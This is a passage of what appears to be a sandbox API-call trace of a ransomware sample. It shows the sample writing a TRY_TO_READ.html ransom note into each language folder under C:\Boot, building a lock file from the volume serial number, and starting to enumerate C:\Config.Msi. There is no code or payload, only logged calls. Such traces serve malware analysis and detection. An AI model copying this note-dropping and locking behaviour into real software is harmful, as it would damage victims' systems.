lpOverlapped=0x0) returned 1 [0065.287] CloseHandle (hObject=0x3dc) returned 1 [0065.287] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.287] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.287] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.287] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d058 | out: hHeap=0x410000) returned 1 [0065.287] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0065.287] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d058 [0065.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d080 [0065.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0a8 [0065.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.288] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.288] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.288] GetLastError () returned 0x0 [0065.288] SetLastError (dwErrCode=0x0) [0065.288] GetLastError () returned 0x0 [0065.288] SetLastError (dwErrCode=0x0) [0065.288] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.288] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\TRY_TO_READ.html" (normalized: "c:\\boot\\ru-ru\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.289] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.289] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.290] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.290] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.290] CloseHandle (hObject=0x3dc) returned 1 [0065.290] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.290] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.290] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.290] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0a8 | out: hHeap=0x410000) returned 1 [0065.290] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0065.290] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.290] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0a8 [0065.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0d0 [0065.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.291] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\TRY_TO_READ.html" (normalized: "c:\\boot\\sv-se\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.291] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.291] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.292] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.292] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.292] CloseHandle (hObject=0x3dc) returned 1 [0065.292] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.292] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.292] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.293] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0065.293] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0065.293] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d0f8 [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d120 [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4a0 [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.293] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\TRY_TO_READ.html" (normalized: "c:\\boot\\tr-tr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.294] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.294] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.295] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.295] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.295] CloseHandle (hObject=0x3dc) returned 1 [0065.295] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4a0 | out: hHeap=0x410000) returned 1 [0065.296] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30674df0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30674df0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30674df0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.296] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0065.296] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4a0 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4c8 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4f0 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.297] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-cn\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.297] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.297] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.298] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.298] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.298] CloseHandle (hObject=0x3dc) returned 1 [0065.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4f0 | out: hHeap=0x410000) returned 1 [0065.298] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0065.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.298] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4f0 [0065.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f518 [0065.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f540 [0065.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.299] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-hk\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.300] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.300] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.301] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.301] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.301] CloseHandle (hObject=0x3dc) returned 1 [0065.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.302] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.302] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.302] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f540 | out: hHeap=0x410000) returned 1 [0065.302] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0065.302] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.302] GetLastError () returned 0x0 [0065.302] SetLastError (dwErrCode=0x0) [0065.302] GetLastError () returned 0x0 [0065.302] SetLastError (dwErrCode=0x0) [0065.302] GetLastError () returned 0x0 [0065.302] SetLastError (dwErrCode=0x0) [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f540 [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f568 [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f590 [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.302] GetLastError () returned 0x0 [0065.302] SetLastError (dwErrCode=0x0) [0065.302] GetLastError () returned 0x0 [0065.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.302] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-tw\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.303] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.303] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.303] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.304] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.304] CloseHandle (hObject=0x3dc) returned 1 [0065.304] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.304] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.304] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.304] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f590 | out: hHeap=0x410000) returned 1 [0065.304] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0065.304] CloseHandle (hObject=0x3cc) returned 1 [0065.304] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.304] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x3ac)) [0065.304] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.305] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.305] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.305] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Config.Msi9c354ca09c354b444c.lock") returned 37 [0065.305] CreateFileW (lpFileName="C:\\\\Config.Msi9c354ca09c354b444c.lock" (normalized: "c:\\config.msi9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.305] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.305] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cae0 | out: hHeap=0x410000) returned 1 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472050 | out: hHeap=0x410000) returned 1 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0065.306] FindFirstFileW (in: lpFileName="C:\\\\Config.Msi\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447be8 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.306] RtlAllocateHeap 